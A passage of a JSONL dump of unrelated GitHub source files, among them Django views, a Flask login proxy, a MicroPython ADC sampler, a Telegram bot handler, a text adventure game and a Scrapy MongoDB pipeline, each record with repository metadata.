- symptoms[\"eyes_close\"]) + 1 + 1) / 5 # (+ 1 whatever position) (+ 1 whatever cardiac pace)\n\n diagnostic[\"Saignement\"] = \\\n \t((1 - symptoms[\"eyes_close\"]) + 1) / 5 # (+ 1 whatever position)\n #((1 - symptoms[\"eyes_close\"]) + symptoms[\"fast_cardiac_pace\"] + 1) / 5 # (+ 1 whatever position)\n\n return diagnostic\n","repo_name":"DeLm0re/PLScare","sub_path":"source/custom/detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":12498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13360526607","text":"import argparse\nimport os\nimport pickle\n\n\nclass MusicLists(dict):\n def __init__(self, file=None):\n super(MusicLists, self).__init__()\n\n self.file = file\n\n if os.path.exists(file) and os.path.getsize(file) > 0:\n with open(file, 'rb') as f:\n dic = pickle.load(f)\n self.update(dic)\n\n\n def addSong(self, tags, url):\n tags.append('songs')\n for l in tags:\n if l not in self:\n self[l] = list()\n if url not in self[l]:\n self[l].append(url)\n\n def removeSong(self, tags, url):\n if tags is None:\n tags = self.keys()\n\n for l in tags:\n if url in self[l]:\n self[l].remove(url)\n if len(self[l]) == 0:\n del self[l]\n\n def saveSong(self):\n with open(self.file, 'wb') as f:\n pickle.dump(self, f)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-m', '--mode', type=str, help='set action mode, [add, remove, clear]', required=True)\n parser.add_argument('-t', '--tags', nargs='*', type=str, help='set tags for the song')\n parser.add_argument('-id', '--url_id', type=str, help='youtube url ID', required=True)\n args = parser.parse_args()\n\n m = MusicLists('playlist.p')\n\n if args.mode == 'add':\n m.addSong(args.tags, args.url_id)\n elif args.mode == 'remove':\n m.removeSong(args.tags, args.url_id)\n else:\n print('only \"add\" or \"remove\" is acceptable mode')\n\n m.saveSong()\n\n print('current playlist: {}'.format(m))\n","repo_name":"jayzhan211/MusicBox","sub_path":"playlist.py","file_name":"playlist.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71642183527","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.urls import reverse_lazy\nfrom django.contrib.auth.views import LoginView, PasswordResetView, PasswordChangeView\nfrom django.contrib import messages\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.views import View\nfrom django.contrib.auth.decorators import login_required\nfrom django.db.models import OuterRef, Subquery\nfrom .models import *\nfrom .forms import * #RegisterForm, LoginForm,TeamSiteForm, UpdateUserForm, UpdateProfileForm, CreateTeamForm,EditTeamForm, DeleteTeamForm\n# from django import template\n# register = template.Library()\nimport smtplib\nfrom django.template.loader import render_to_string\nfrom django.utils.html import strip_tags\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom datetime import datetime\n\n@login_required\ndef TeamRosterView(request,id):\n \n if(request.method == 'GET'):\n teamID = get_object_or_404(Team, TeamID=id)\n teamRosters = TeamRoster.objects.filter(Team_id=id).all()\n teamRosterForm = TeamRosterForm()\n return render(request, 'teams/players/TeamRoster.html', {'TeamRoster': teamRosters, 'Team_Roster_Form': teamRosterForm})\n elif (request.method == 'POST'):\n team = get_object_or_404(Team, TeamID=id)\n form = TeamRosterForm(request.POST, files = request.FILES)\n if(form.is_valid()):\n newRoster = form.save(commit=False)\n newRoster.Team = team\n newRoster.save()\n msg = \"Player has been added.\"\n messages.success(request, msg)\n return redirect(to='team-rosters', id=id)\n else:\n teamRosterForm = TeamRosterForm(request.POST, files = request.FILES, instance=teamID)\n return render(request, 'teams/players/TeamRoster.html', {'TeamRoster': teamRosters, 'Team_Roster_Form': form})\n\n@login_required\ndef EditTeamRosterView(request,id):\n \n if(request.method == 'GET'):\n player = get_object_or_404(TeamRoster, TeamPlayerID=id)\n teamID = player.Team.TeamID\n teamRosterForm = TeamRosterForm(instance=player)\n return render(request, 'teams/players/EditRosterPlayer.html', {'Team_Roster_Form': teamRosterForm, 'TeamID': teamID})\n elif (request.method == 'POST'):\n player = get_object_or_404(TeamRoster, TeamPlayerID=id)\n form = TeamRosterForm(request.POST, files = request.FILES, instance=player)\n if(form.is_valid()):\n newRoster = form.save(commit=True)\n newRoster.Team.TeamID\n msg = \"Player has been updated.\"\n messages.success(request, msg)\n return redirect(to='team-rosters', id=newRoster.Team.TeamID)\n else:\n teamRosterForm = TeamRosterForm(instance=player)\n return render(request, 'teams/players/EditRosterPlayer.html', {'Team_Roster_Form': teamRosterForm})\n \n@login_required\ndef DeleteTeamRosterView(request,id):\n \n if(request.method == 'GET'):\n player = get_object_or_404(TeamRoster, TeamPlayerID=id)\n teamID = player.Team.TeamID \n teamRosterForm = TeamRosterForm(instance=player)\n return render(request, 'teams/players/DeleteRosterPlayer.html', {'PlayerFullName': player.FullName, \"TeamID\": teamID})\n elif (request.method == 'POST'):\n player = get_object_or_404(TeamRoster, TeamPlayerID=id)\n TeamRoster.objects.filter(TeamPlayerID=player.TeamPlayerID).delete()\n teamID = player.Team.TeamID\n msg = \"Player has been deleted.\"\n messages.success(request, msg)\n return redirect(to='team-rosters', id=teamID)\n","repo_name":"brandonmichaelhunter/DevToLindoChallenge","sub_path":"users/teamroster_views.py","file_name":"teamroster_views.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11939334984","text":"import pyb\nimport utime\nimport array\nimport task_share\n\nimport micropython\nmicropython.alloc_emergency_exception_buf(100)\n\n## The input pin for the Nucleo. \npc0 = pyb.Pin(pyb.Pin.board.PC0, pyb.Pin.OUT_PP)\n## The output pin for the Nucleo. \npc1 = pyb.Pin(pyb.Pin.board.PC1, pyb.Pin.OUT_PP)\n## Variable reading from the ADC.\nadc = pyb.ADC(pc0)\n\n## Instantiation of Encoder 2 reading shared variable.\nqueue = task_share.Queue ('h', 1000, thread_protect = False, overwrite = False,\n name = \"adcreading\")\n\n## Array storing time data.\ntime_list = array.array(\"f\", [0] * int(1002))\n\nqueue.clear()\n\n## Index to iterate through arrays\nruns = 0\n\n## Start time variable.\nstart_time = utime.ticks_ms()\n\ndef interrupts(tim):\n \"\"\"!\n Interrupt callback function.\n @param tim Timer object used for interrupts\n \"\"\"\n global runs\n \n if runs <= 1000:\n# adc.read()\n queue.put(adc.read(), in_ISR = True)\n ## Index time variable\n g_time = utime.ticks_ms()\n ## Time data list\n time_list[runs] = utime.ticks_diff(g_time, start_time)\n runs += 1\n else:\n pc1.low()\n tim.callback(None)\n \n \nif __name__ == \"__main__\":\n ## Timer object used for interrupts.\n tim = pyb.Timer(1, freq=500)\n pc1.high()\n tim.callback(interrupts)\n ## Index variable\n idx = 0\n while idx <= 1000:\n ## Voltage data variable\n pos = queue.get()\n print('{:},{:}'.format(time_list[idx], pos))\n idx += 1\n \n","repo_name":"nishkachawla/me405_lab4","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14346535349","text":"from keyboard import admin\r\nfrom function.bot_and_db.bot_and_db import bot\r\nfrom function.bot_and_db.bot_and_db import db\r\n\r\n\r\n\r\n\r\n# Получаем id пользователя\r\ndef user_information(message):\r\n\tuser_id = message.text\r\n\r\n\tif user_id != \"Отменить\":\r\n\r\n\t\tname, link, balance, black = db.my_profil(user_id)\r\n\r\n\t\tif str(name) != \"Error\":\r\n\t\t\tbot.send_message(\r\n\t\t\t\tmessage.from_user.id,\r\n\t\t\t\t\"ID: \" + str(user_id) +\r\n\t\t\t\t\"\\nИмя: \" + str(name) +\r\n\t\t\t\t\"\\nСсылка: @\" + str(link) +\r\n\t\t\t\t\"\\nБаланс: \" + str(balance) +\r\n\t\t\t\t\"\\nБан: \" + str(black),\r\n\t\t\t\treply_markup=admin.btn_admin_user)\r\n\r\n\t\telif str(name) == \"Error\":\r\n\t\t\tbot.send_message(message.from_user.id, \"Прозошла ошибка, пользователь не найден\", reply_markup=admin.btn_admin_user)\r\n\r\n\t\telse:\r\n\t\t\tpass\r\n\r\n\telif user_id == \"Отменить\":\r\n\t\tbot.send_message(message.from_user.id, \"Вы отменили действие бана\", reply_markup=admin.btn_admin_user)","repo_name":"GarikSukiasyan/bot_telegram_template","sub_path":"function/admin/info_user.py","file_name":"info_user.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44183049632","text":"from django.urls import path, include\nfrom game.views.setting.getinfo import InfoView\nfrom game.views.setting.register import PlayerView\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n)\n\n\nurlpatterns = [\n path(\"token/\", TokenObtainPairView.as_view(), name=\"setting_token\"),\n path(\"token/refresh/\", TokenRefreshView.as_view(),\n name=\"setting_token_refresh\"),\n path(\"getinfo/\", InfoView.as_view(), name=\"setting_getinfo\"),\n path(\"register/\", PlayerView.as_view(), name=\"setting_register\"),\n path(\"qq_login/\", include(\"game.urls.setting.qq_login.index\")),\n]\n","repo_name":"666hsy/app","sub_path":"game/urls/setting/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18516933808","text":"import os, cv2\r\nimport numpy as np\r\nimport matplotlib as mpl\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.gridspec import GridSpec\r\n\r\n_projectDirectory = os.path.dirname(__file__)\r\n_imagesDirectory = os.path.join(_projectDirectory, \"images\")\r\n\r\n#record all the images inside _imageDirectory folder into a list\r\n_images = []\r\nfor _root, _dirs, _files in os.walk(_imagesDirectory):\r\n\tfor _file in _files:\r\n\t\tif _file.endswith(\".jpg\"):\r\n\t\t\t_images.append(_imagesDirectory + \"\\\\\" + _file)\r\n\r\n_imageIndex = 0\r\n_imageTotal = len(_images)\r\n\r\n#prepare the figure\r\n#mpl.rcParams['toolbar'] = 'None' #disable matplotlib toolbar\r\n_fig = plt.figure(\"Image Slideshow\")\r\n_gs = GridSpec(3, 3)\r\n_fig1 = plt.subplot(_gs[0:3, 0:3])\r\n\r\n#initialize the figure with first image in the list\r\n_img = cv2.imread(_images[_imageIndex], cv2.IMREAD_UNCHANGED)\r\n_imgShow = cv2.cvtColor(_img, cv2.COLOR_BGR2RGB) #for displaying purpose\r\n_imgShowIt = plt.imshow(_imgShow)\r\n\r\ndef _changeImage(event):\r\n\tglobal _imageIndex #global is needed if we want to assign a value to the global variable\r\n\t_imageIndex += 1\r\n\tif _imageIndex == _imageTotal: #no global needed if we just want to read the value of global variable\r\n\t\t_imageIndex = 0\r\n\t_img = cv2.imread(_images[_imageIndex], cv2.IMREAD_UNCHANGED) #this syntax doesn't refer to global variable\r\n\t_imgShow = cv2.cvtColor(_img, cv2.COLOR_BGR2RGB) #for displaying purpose, also this syntax doesn't refer to global variable\r\n\t_imgShowIt.set_array(_imgShow) #modify the data inside global object, no global needed since we use the object's method\r\n\tplt.draw()\r\n\t\r\n_cid = _fig.canvas.mpl_connect('button_press_event', _changeImage) #record the connection id, so we can disconnect the callback later\r\n\r\nplt.xticks([]), plt.yticks([]) #hide tick values on X and Y axis\r\nplt.tight_layout()\r\nplt.show()\r\n","repo_name":"ideaspaper/PythonCodes","sub_path":"matplotlibExcercise/imageSlideShow/imageSlideShow.py","file_name":"imageSlideShow.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8962489482","text":"from django.shortcuts import render\n\nfrom django.contrib.auth.decorators import login_required, permission_required\n\n# Create your views here.\n\n\n# lihat can_edit di models\n# @permission_required('blog_can_edit')\ndef updateView(request):\n context ={\n 'page_title':'edit Artikel',\n }\n return render(request, 'blog/edit.html', context)\n# untuk permision sendiri/peruser jika di user masuuk blog|add\n@permission_required('blog.add_artikel')\n\n# melakukan forbiden terhadap user yg tidakbisa mengakses\n# bisa double\n@login_required\n@permission_required('blog.add_edit', login_url=None, raise_exception=True)\n\n# diawal akan masuk ke login\n# @permission_required('blog.add_artikel', login_url='/admin/')\ndef addView(request):\n context ={\n 'page_title':'Add Artikel',\n }\n return render(request, 'blog/add.html', context)\n\ndef indexView(request):\n print(request.user.get_all_permissions())\n context ={\n 'page_title':'Blog',\n }\n return render(request, 'blog/index.html', context )\n","repo_name":"Imamabdulfatah/Belajar-DjangoPython","sub_path":"31. permisionRequirement/django/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7793052330","text":"from Window import Window\nfrom constants import ComputedConstants\nfrom cell import Cell\n\nwindow = Window(6000, 1e5, 300, 4000, 12000, 200,resX=300,resY=900)\n\n\nComputedConstants.decoloringRatio = 0.85 # speed at which colors return to black after collision (0: instant, 0.5, after two/three frames, 1 never)\nwindow.nStep = 2 # two time step by frame\n\n\ndef newAdvect(self):\n self.coords.xs += self.coords.vxs * ComputedConstants.dt\n self.coords.ys += self.coords.vys * ComputedConstants.dt\n self.coords.vys += -9.81 * ComputedConstants.dt\n\n\nCell.advect = newAdvect\n\nwindow.run()\n\n\n","repo_name":"mbrebion/pythonParticle","sub_path":"animations/fluidStatic.py","file_name":"fluidStatic.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"14815994081","text":"#!/usr/bin/python3\nimport os\n# Replace RPG starter project with this code when new instructions are live\nos.system(\"clear\")\nprint('PARHELION: A SPACE SURVIVAL GAME')\nname = input('Enter your name?')\n\ndef showInstructions():\n #print a main menu and the commands\n print(\"\"\"\n========\nYou are a junior engineer aboard the Parhelion, bound towards a deep space terraforming \ncolony. After the Parhelion escapes orbit, you enter your autohomeostasis pod to spend a \nmajority of the trip in peaceful sleep. You awaken groggily as the emergency awaken injects you with the combination of restoratives, and your pod cracks open slightly. The stinging\nacrid smell of burnt metal seeps into your pod. If you push your pod door, you can\nprobably free yourself from the pod. \"\"\")\n input(\"Try, 'push pod'\")\n\n print(\"\"\"\nAs you push the pod open, the wristband of\nyour bodysuit flashes, and you see the OXYGEN meter drop from 100% down to 99%.\nCommands:\n go [direction]\n get [item]\n look []\n examine [object]\n\"\"\")\n\ndef showStatus():\n #print the player's current status\n print('---------------------------')\n print('Oxygen saturation is at', oxy, '%')\n print('You are in the ' + currentRoom)\n #print the current inventory\n print('Inventory : ' + str(inventory))\n #print an item if there is one\n # if \"item\" in rooms[currentRoom]:\n # print('You see a ' + rooms[currentRoom]['item'])\n print(\"---------------------------\")\n\n#an inventory, which is initially empty\ninventory = []\nbody = int(3)\nskills = []\n\n#a dictionary linking a room to other rooms\n## A dictionary linking a room to other rooms\ndef objects(target):\n if currentRoom == 'Crew Stasis Bay 9':\n if target == 'console':\n print('its a console')\n elif target == 'pod':\n print('theres a tool under the pod')\n return 0\n elif room == 'passage':\n print('youre in a passage')\n return 0\n \n\n\nrooms = {\n\n 'Crew Stasis Bay 9' : {\n 'south' : 'P-Way',\n 'east' : 'Utility Locker',\n 'item' : 'L-tool',\n 'object' : {\n 'console',\n 'pod',\n },\n },\n\n 'P-Way' : {\n 'north' : 'Hall',\n 'south' : 'Bridge',\n 'item' : 'monster',\n },\n 'Utility Locker' : {\n 'west' : 'Hall',\n 'south': 'Garden',\n 'item' : 'potion',\n },\n 'Garden' : {\n 'north' : 'Dining Room'\n },\n 'Pantry' : {\n 'south' : 'Dining Room',\n 'item' : 'cookie',\n }\n }\n\n#start the player in the Hall\ncurrentRoom = 'Crew Stasis Bay 9'\n\nshowInstructions()\noxy = int(101)\n#loop forever\nwhile True:\n oxy -= 2\n showStatus()\n\n #get the player's next 'move'\n #.split() breaks it up into an list array\n #eg typing 'go east' would give the list:\n #['go','east']\n move = ''\n while move == '':\n move = input('>')\n\n # split allows an items to have a space on them\n # get golden key is returned [\"get\", \"golden key\"] \n move = move.lower().split(\" \", 1)\n\n #if they type 'go' first\n\n#if player looks for something\n if move[0] == 'look':\n objects(move[1])\n else:\n print(\"It's not worth looking at\")\n\n #if they type 'get' first\n if move[0] == 'get':\n #if the room contains an item, and the item is the one they want to get\n if 'item' in rooms[currentRoom] and move[1] in rooms[currentRoom]['item']:\n #add the item to their inventory\n inventory += [move[1]]\n #display a helpful message\n print(move[1] + ' got!')\n #delete the item from the room\n del rooms[currentRoom]['item']\n #otherwise, if the item isn't there to get\n else:\n #tell them they can't get it\n print('Can\\'t get ' + move[1] + '!')\n \n ## Define how a player can win\n if currentRoom == 'bridge' and 'key' in inventory and 'potion' in inventory:\n print('You push the button and the whole ship trembles as it is pulled towards a wonderous destinations...YOU WIN!!')\n break\n\n ## If player gets hurt enough times\n if body <= 0:\n print(\"Your body is unable to sustain any more damage...you die.\")\n break\n ## If a player runs out of air\n elif oxy <= 0:\n print('gasping for air, darkness creeps in from the edges of your vision... GAME OVER!')\n break\n","repo_name":"jimlabbe/mycode","sub_path":"week2/spacegame.py","file_name":"spacegame.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32442878084","text":"from flask import Flask, request, jsonify\nfrom flask_restful import Resource, Api\nfrom flask_cors import CORS\nimport json\n\nimport requests\n\n\napp = Flask(__name__)\napi = Api(app)\nCORS(app)\n\ntodos = {}\n\n\nclass Api(Resource):\n def get(self):\n\n data = request.json\n\n res = requests.get(\n \"https://6u3td6zfza.execute-api.us-east-2.amazonaws.com/prod/user/transactions\")\n\n return res.json()\n\n def post(self):\n data = request.json\n\n res = requests.post(\n \"https://6u3td6zfza.execute-api.us-east-2.amazonaws.com/prod/user/login\", json=data)\n if res.ok:\n return {\"authenticated\": True}\n\n return {\"authenticated\": False}\n\n def put(self):\n with open(\"canceled_transactions.txt\", 'a') as f:\n f.write(json.dumps(request.json)+\"\\n\")\n return {\"canceled\": True}\n\n # def options (self):\n # return {\"Allow\" : '*/*' }, 200, \\\n # { \"Access-Control-Allow-Origin\": \"*\", \\\n # \"Access-Control-Allow-Methods\" : \"*\" }\n\n\napi.add_resource(Api, '/')\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n","repo_name":"dondippino/angular-python-demo","sub_path":"backend/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31485006747","text":"# coding: utf-8\n\nclass GPOS:\n gpos_num = 61\n gpos_list = (\n 'a', # 形容词\n 'c', # 连词\n 'd', # 副词\n 'f', # 方位词\n 'i', # 成语\n 'm', # 数词\n 'n', # 普通名词\n 'nr', # 人名\n 'nx', # 外语\n 'nz', # 专有名词\n 'o', # 拟声词\n 'p', # 介词\n 'q', # 量词\n 'r', # 代词\n 't', # 时间名词\n 'u', # 助词\n 'v', # 动词\n 'w', # 标点符号\n 'y', # 语气词\n \n 'cc', # Coordinating conjunction \n 'cd', # Cardinal number\n 'colon', # \n 'comma', #\n 'dash', # \n 'dt', # Determiner\n 'ex', # Existential there \n 'fw', # Foreign Word \n 'hyphen', # \n 'in', # Preposision or subordinating conjunction\n 'jj', # Adjective \n 'jjr', # Adjective, comparative\n 'jjs', # Adjective, superlative\n 'lrb', # \n 'md', # Modal \n 'nn', # Noun, singular or mass \n 'nnp', # Proper Noun, singular \n 'nnps', # Proper Noun, plural \n 'nns', # Noun, plural \n 'pdt', # Predeterminer \n 'pos', # Possessive Ending\n 'prp', # Personal Pronoun \n 'prpg', # Possessive Pronoun \n 'rb', # Adverb \n 'rbr', # Adverb, comparative \n 'rbs', # Adverb, superlative \n 'rp', # Particle \n 'rrb', # \n 'sent', # \n 'sym', # Symbol \n 'to', # To\n 'uh', # Interjection \n 'vb', # Verb, base form \n 'vbd', # Verb, past tense \n 'vbg', # Verb, gerund or persent participle \n 'vbn', # Verb, past participle \n 'vbp', # Verb, non-3rd person singular present \n 'vbz', # Verb, 3rd person singular present \n 'wdt', # Wh-determiner \n 'wp', # Wh-pronoun \n 'wpg', # Possessive wh-pronoun \n 'wrb', # Wh-adverb\n )\n gpos_dict = {\n 'a': 0,\n 'c': 1,\n 'd': 2,\n 'f': 3,\n 'i': 4,\n 'm': 5,\n 'n': 6,\n 'nr': 7,\n 'nx': 8,\n 'nz': 9,\n 'o': 10,\n 'p': 11,\n 'q': 12,\n 'r': 13,\n 't': 14,\n 'u': 15,\n 'v': 16,\n 'w': 17,\n 'y': 18,\n \n 'cc': 19, \n 'cd': 20, \n 'colon': 21, \n 'comma': 22, \n 'dash': 23, \n 'dt': 24, \n 'ex': 25, \n 'fw': 26, \n 'hyphen': 27, \n 'in': 28, \n 'jj': 29, \n 'jjr': 30, \n 'jjs': 31, \n 'lrb': 32, \n 'md': 33, \n 'nn': 34, \n 'nnp': 35, \n 'nnps': 36, \n 'nns': 37, \n 'pdt': 38, \n 'pos': 39, \n 'prp': 40, \n 'prpg': 41, \n 'rb': 42, \n 'rbr': 43, \n 'rbs': 44, \n 'rp': 45, \n 'rrb': 46, \n 'sent': 47, \n 'sym': 48, \n 'to': 49, \n 'uh': 50, \n 'vb': 51, \n 'vbd': 52, \n 'vbg': 53, \n 'vbn': 54, \n 'vbp': 55, \n 'vbz': 56, \n 'wdt': 57, \n 'wp': 58, \n 'wpg': 59, \n 'wrb': 60,\n }\n \n @staticmethod\n def gpos2idx(gpos):\n return GPOS.gpos_dict.get(gpos, GPOS.gpos_dict['n'])\n \n @staticmethod\n def idx2gpos(idx):\n if -GPOS.gpos_num <= idx < GPOS.gpos_num:\n return GPOS.gpos_list[idx]\n return 'n'\n \n @staticmethod\n def is_punc(gpos): # punctuation mark\n if gpos in ['w', 'sent', 'comma', 'dash', 'hyphen', 'colon', 'sym', 'lrb', 'rrb']:\n return True\n return False\n \n @staticmethod\n def one_hot(gpos):\n hot = [0. for _ in range(GPOS.gpos_num)]\n hot[GPOS.gpos2idx(gpos)] = 1.\n return hot\n\n\nif __name__ == \"__main__\":\n \n print(GPOS.one_hot('n'))\n \n","repo_name":"wwyuan2023/TextParser","sub_path":"textparser/utils/gpos.py","file_name":"gpos.py","file_ext":"py","file_size_in_byte":3925,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"10657619880","text":"# implementation of water jug problem using BFS\r\nfrom collections import deque\r\n# function to solve water jug problem using BFS Approach\r\ndef waterJug(cap1,cap2,target):\r\n # Map is used to store the states, every state is hashed to binary value to indicate either \r\n # that state is visited before or not\r\n visited = {}\r\n isSolvable = False\r\n path = []\r\n # queue to maintain states\r\n q = deque()\r\n # initializating with initial state\r\n q.append((0,0))\r\n while(len(q)>0):\r\n # current state\r\n state = q.popleft()\r\n #print(state)\r\n # If this state is already visited\r\n if(state in visited):\r\n continue\r\n # Doesn't met jug constraints\r\n if(state[0]>cap1 or state[1]>cap2 or state[0]<0 or state[1]<0):\r\n continue\r\n # Filling the vector for constructing the solution path\r\n path.append((state[0],state[1]))\r\n # Marking current state as visited\r\n visited[state] = True\r\n # If we reach the goal state\r\n if(state[0]==target[0] and state[1]==target[1]):\r\n isSolvable = True\r\n #path.append(state)\r\n print('Jug1\\tJug2')\r\n for i in range(len(path)):\r\n print(str(path[i][0])+'\\t'+str(path[i][1]))\r\n break\r\n #print(state)\r\n # fill the first jug\r\n if(state[0]0):\r\n #path.append((0,state[1]))\r\n q.append((0,state[1]))\r\n # empty the second jug\r\n if(state[1]>0):\r\n #path.append((state[0],0))\r\n q.append((state[0],0))\r\n # Pour from 1st jug to 2nd until its full\r\n if(state[0]>0 and state[0]+state[1]>=cap2):\r\n #path.append((state[0]-(cap2-state[1]),cap2))\r\n q.append((state[0]-(cap2-state[1]),cap2))\r\n # Pour from 2nd jug to 1st until its full\r\n if(state[1]>0 and state[0]+state[1]>=cap1):\r\n #path.append((cap1,state[1]-(cap1-state[0])))\r\n q.append((cap1,state[1]-(cap1-state[0])))\r\n # Pour all water from 1st to 2nd\r\n if(state[0]>0 and state[0]+state[1]<=cap2):\r\n #path.append((0,state[0]+state[1]))\r\n q.append((0,state[0]+state[1]))\r\n # Pour all water from 2nd to 1st\r\n if(state[1]>0 and state[0]+state[1]<=cap1):\r\n #path.append((state[0]+state[1],0))\r\n q.append((state[0]+state[1],0))\r\n # No, solution exists \r\n if (not isSolvable):\r\n print (\"No solution\")\r\n #print(path)\r\n #print(path)\r\nif __name__ == '__main__':\r\n cap1, cap2 = tuple(map(int,input('Enter the capacity of jug 1 and jug 2: ').split()))\r\n target = tuple(map(int,input('Enter the final capacity of jug1 and jug 2: ').split()))\r\n waterJug(cap1,cap2,target)","repo_name":"shaina-12/Artificial-Intelligence","sub_path":"AI/Water Jug Using BFS.py","file_name":"Water Jug Using BFS.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"38712587627","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\nimport time\n\nimport redis\nfrom pymongo import MongoClient\n\n\nclass AnchoridspiderPipeline(object):\n def process_item(self, item, spider):\n return item\n\nclass AnchoridspiderMongoDBPipeline(object):\n # collection = 'YunzkData(ku.iyunzk.com)'\n def __init__(self, mongo_uri, mongo_db, collection_dict, mongo_port):\n self.mongo_uri = mongo_uri\n self.mongo_db = mongo_db\n self.mongo_port = mongo_port\n self.collection_dict = collection_dict\n self.time_str = time.strftime(\"%Y-%m-%d\", time.localtime())\n\n @classmethod\n def from_crawler(cls, crawler):\n '''\n scrapy为我们访问settings提供了这样的一个方法,这里,\n 我们需要从settings.py文件中,取得数据库的URI和数据库名称\n '''\n return cls(\n mongo_uri=crawler.settings.get('MONGO_URI'),\n mongo_db=crawler.settings.get('MONGO_DB'),\n collection_dict=crawler.settings.get('COLLECTION'),\n mongo_port=crawler.settings.get('MONGO_PORT')\n )\n\n def open_spider(self, spider):\n print(spider.name)\n self.redis = redis.StrictRedis(host='192.168.1.45', port=6379, db=0, password='admin')\n self.client = MongoClient(self.mongo_uri, port=self.mongo_port)\n self.db = self.client[self.mongo_db]\n self.collection = self.db[self.collection_dict[spider.name]]\n\n def close_spider(self, spider):\n self.client.close()\n\n def process_item(self, item, spider):\n if spider.name == 'tb_anchor_goods':\n self.process_anchor_goods(item)\n elif spider.name == 'tb_anchor':\n self.process_anchor(item)\n elif spider.name == 'tbshop':\n self.process_id_to_redis(item)\n # self.process_anchor(item)\n elif spider.name == 'search_aid':\n self.process_id_to_redis(item)\n elif spider.name == 'aliVsessionAnchor':\n self.process_id_to_redis(item)\n self.process_anchor(item)\n elif spider.name == 'searchAnchorAnchorIdAPI':\n self.process_id_to_redis(item)\n self.process_anchor(item)\n elif spider.name == 'fansFeature':\n self.process_anchorfansFeature(item)\n elif spider.name == 'searchAnchorAPI':\n self.process_id_to_redis(item)\n self.process_anchor(item)\n elif spider.name == 'organ_info':\n self.process_organ(item)\n\n def process_anchor_goods(self, item):\n # res = self.collection.find_one({\"accountId\": item.get('accountId')})\n\n anchor = dict(item)\n anchor['accountId'] = item.get('accountId')\n anchor['accountName'] = item.get('accountName')\n anchor['title'] = item.get('title')\n anchor['createTime'] = item.get('createTime')\n anchor['itemId'] = item.get('itemId')\n anchor['sellerId'] = item.get('sellerId')\n anchor['goods_url'] = item.get('goods_url')\n anchor['shopName'] = item.get('shopName')\n anchor['liveId'] = item.get('liveId')\n anchor['liveURL'] = item.get('liveURL')\n anchor['livePrice'] = item.get('livePrice')\n anchor['categoryId'] = item.get('categoryId')\n anchor['class2name'] = item.get('class2name')\n anchor['shopId'] = item.get('shopId')\n anchor['shopType'] = item.get('shopType')\n anchor['maintype'] = item.get('maintype')\n anchor['rootCategoryId'] = item.get('rootCategoryId')\n self.collection.insert_one(anchor)\n return item\n\n def process_anchor(self, item):\n res = self.collection.find_one({\"anchorId\": str(item.get('anchorId'))})\n try:\n darenScore = int(item.get('darenScore'))\n except:\n darenScore = None\n\n try:\n fansCount = int(item.get('fansCount'))\n except:\n fansCount = None\n if not res:\n data = {\n\n 'anchorId': str(item.get('anchorId')),\n 'anchorName': item.get('anchorName'),\n 'houseId': None,\n 'fansCount': fansCount,\n 'liveCount': None,\n 'city': item.get('city'),\n 'creatorType': item.get('creatorType'),\n 'darenScore': darenScore,\n 'descText': item.get('descText'),\n 'anchorPhoto': item.get('anchorPhoto'),\n 'organId': item.get('organId'),\n 'fansFeature': None,\n 'historyData': None,\n 'servType': item.get('servType'),\n }\n self.collection.insert_one(data) # 插入一条不存在的主播数据\n else:\n try:\n servType = res.get('servType')\n except:\n servType = -1\n if res.get('fansCount') == fansCount and res.get('anchorPhoto') == item.get('anchorPhoto') and res.get('anchorName') == item.get('anchorName') and res.get('city') == item.get('city') and res.get('creatorType') == item.get('creatorType') and res.get('darenScore') == darenScore and res.get('organId') == item.get('organId') and servType == item.get('servType'):\n pass\n else:\n self.collection.update_one({'anchorId': str(id)},\n {'$set':\n {\n 'fansCount': fansCount,\n 'anchorName': item.get('anchorName'),\n 'city': item.get('city'),\n 'creatorType': item.get('creatorType'),\n 'darenScore': darenScore,\n 'descText': item.get('descText'),\n 'anchorPhoto': item.get('anchorPhoto'),\n 'organId': item.get('organId'),\n 'servType': item.get('servType')\n }\n }\n ) # 